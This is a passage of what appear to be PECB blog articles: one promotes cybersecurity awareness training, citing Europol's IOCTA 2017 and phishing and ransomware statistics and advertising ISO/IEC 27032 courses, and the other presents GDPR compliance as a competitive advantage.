Moreover, according to Europol’s IOCTA 2017 assessment, a portion of the cyberattacks announced from mid-2017 follows this pattern. For genuinely financially motivated attacks, extortion remains a typical strategy, with ransomware and Distributed Denial of Service (DDoS) attacks remaining priorities for EU law enforcement. Europol stated that CNI firms should be “better instructed, prepared and equipped to manage these attacks”, using the GDPR and the NIS Directive to enhance baseline security. It added that law enforcement’s “prevention and awareness” strategies needed to adapt to the growth of social engineering as an “essential tactic”.
Ilia Kolochenko, the CEO of High-Tech Bridge, argued that ransomware will be around for at least another decade. He added that “Many organizations and individuals have abandoned machines they have not updated for years for various reasons, from overt negligence to complicated business processes and compliance. Worse, many large companies and governmental organizations don’t even have a comprehensive and up-to-date inventory of their digital assets, and are not even aware that such systems exist.”
Why should organizations consider a cybersecurity awareness training program?
Given that attackers have attained a level of sophistication that cannot be countered by traditional defensive strategies alone, it is important to focus on educating users, as they are key components of cyber security. If users lack proper awareness and education on how to use digital tools securely in their daily operations, your defense system will have a massive gap and security controls will fail to be effective. This modern era of cyberattacks expects users to participate in the cyber protection of the organization, and the greatest mistake that organizations seem to make is to rely only on sophisticated technology and software as cyber-defense mechanisms.
Figure 1. Statistics regarding data breaches – January 2017 until June 2017
Phishing attacks account for 91 percent of data breaches, and if users are not prepared to recognize and properly respond to these attacks, the danger of an effective breach or malware attack, for example ransomware, is significantly increased.
That being said, organizations should implement a policy on employee cyber-security awareness, and acknowledge cyber-security awareness as an active cyber defense measure that supports the fight against cyber threats. Considering the unavoidable financial, productivity and reputation costs incurred by information theft, a well-thought-out plan on how to manage these situations should be established in advance.
In this case, the ISO/IEC 27032 standard gives guidelines and explanations on how companies can ensure safer data processing. There are security issues that are not covered by current information security, network security and application security practices, as there are gaps between these domains resulting from poor communication between organizations. Therefore, this International Standard addresses Cyberspace security, or Cybersecurity, issues by bridging the gaps between the different security domains in Cyberspace. Visit our web site for ISO27032 Cybersecurity Training courses.
Author: Ardian Berisha is the Portfolio Marketing Manager for Information Security Management at PECB. He is in charge of conducting market research while developing and providing information related to ISM standards. If you have any questions, please do not hesitate to contact him: email@example.com.
Co-Author: Albion Bikliqi is PECB’s Information Security Manager. He is the key person, or process owner, for all the activities pertaining to protecting the confidentiality and integrity of any related business data that is of great significance to the organization. While carrying out these ongoing activities, he ensures that the organization’s rules and regulations are adhered to by the employees. If you have any questions, please do not hesitate to contact him: firstname.lastname@example.org.
How to turn GDPR compliance into an opportunity?
GAINING A COMPETITIVE ADVANTAGE FROM THE GDPR
The information era brings blessings to human society, but at the same time threatens people’s privacy. As humans spend increasing amounts of time in the digital world, personal data protection is placed at the heart of many heated debates, which often conclude that we currently live in a world where people’s privacy is highly fragile.
While various reports show an unprecedented rise in personal data breaches, it is vital for organizations to start prioritizing the protection of confidential data as an effort to maintain stable efficiency and prevent financial losses. Given that the GDPR enforcement date is just around the corner, businesses should take the necessary measures to ensure compliance with the new regulation.
Initially, GDPR will certainly be a challenge; however, the benefits and added value for both businesses and customers derived by GDPR compliance will offset the challenges and difficulties faced.
The General Data Protection Regulation (GDPR) offers a distinctive opportunity for businesses to better respond to customer requests. GDPR will change the way organizations approach data privacy and how they handle and process data, including how data protection policies and impact assessments are established and conducted.
As businesses begin to implement, monitor and review controls and procedures to be GDPR compliant, they will witness its long-term benefits. Some of these benefits are outlined below:
It is important for companies to take a proactive approach to lessen the probability of penalties and gain a competitive advantage. GDPR will lead organizations to implement good data handling practices and build transparency, thus allowing them to grow their customer base and avoid damage to their brand reputation. This will help organizations retain existing customers and attract new ones, as customers will feel confident that their data is maintained and processed by trustworthy systems.
Author: Endrita Muhaxheri is the Portfolio Marketing Manager for Governance, Risk, and Compliance & Health, Safety and Environment at PECB. She is responsible for continually conducting market research and writing articles and marketing materials related to GRC and HSE. If you have any questions, please do not hesitate to contact her: email@example.com.